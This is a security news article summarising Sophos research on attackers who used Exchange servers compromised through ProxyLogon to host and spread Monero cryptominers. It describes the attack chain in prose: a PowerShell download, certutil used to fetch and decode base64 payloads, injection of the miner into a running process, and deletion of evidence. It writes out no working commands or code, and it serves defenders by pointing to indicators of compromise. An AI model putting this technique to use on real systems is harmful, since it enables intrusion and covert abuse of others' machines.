Fallout from ProxyLogon Attack Continues
Researchers from Sophos has discovered threat actors targeting compromised Exchange servers in order to host malicious Monero cryptominers. The payload for this attack was itself hosted on a compromised Exchange server. Researchers said they detected the executables associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA), according to the report. Researchers published a list of indicators of compromise on the SophosLabs GitHub page to help organizations recognize if they’ve been attacked in this way.
The attack as observed by researchers began with a PowerShell command to retrieve a file named win_r.zip from another compromised server’s Outlook Web Access logon path (/owa/auth), according to the report. Under closer inspection, the .zip file was not a compressed archive at all but a batch script that then invoked the built-into-Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which also were not compressed.
The first file is written out to the filesystem as QuickCPU.b64, an executable payload in base64 that can be decoded by the certutil application, which by design can decode base64-encoded security certificates, researchers observed.
The batch script then runs another command that outputs the decoded executable into the same directory. Once decoded, the batch script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, and then deletes any evidence that it was there, according to the report.
The executable in the attack appears to contain a modified version of a tool publicly available on Github called PEx64-Injector, which is described on its Github page as having the ability to “migrate any x64 exe to any x64 process” with “no administrator privileges required,” according to the report.
Once the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration temporarily to the filesystem. It then configures the miner, injects it into a running process, then quits, according to the report. “The batch file then deletes the evidence and the miner remains running in memory, injected into a process already running on the system,” Brandt wrote.
Researchers observed the cryptominer receiving funds on March 9, which is when Microsoft also released updates to Exchange to patch the flaws. Though the attacker lost several servers after this date and the output from the miner decreased, other servers that were gained thereafter more than made up for the early losses, according to the report.
Further Reading:
Indicators of Compromise (IOCs)